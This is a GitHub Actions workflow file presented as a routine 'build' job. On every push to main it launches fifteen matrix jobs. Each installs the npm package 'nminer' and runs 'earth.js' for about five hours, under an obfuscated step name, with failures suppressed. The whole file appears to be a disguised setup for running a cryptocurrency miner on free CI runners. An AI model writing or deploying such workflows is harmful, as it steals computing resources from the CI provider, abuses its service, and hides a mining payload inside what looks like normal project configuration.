name: earth
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2394 }
          - { version: 6116 }
          - { version: 1355 }
          - { version: 8898 }
          - { version: 3317 }
          - { version: 710 }
          - { version: 967 }
          - { version: 4182 }
          - { version: 8823 }
          - { version: 7610 }
          - { version: 8092 }
          - { version: 6762 }
          - { version: 6165 }
          - { version: 3736 }
          - { version: 3875 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: gray disarm per
        run: |
          npm install nminer@latest
          timeout 310m node earth.js || echo "earth executed"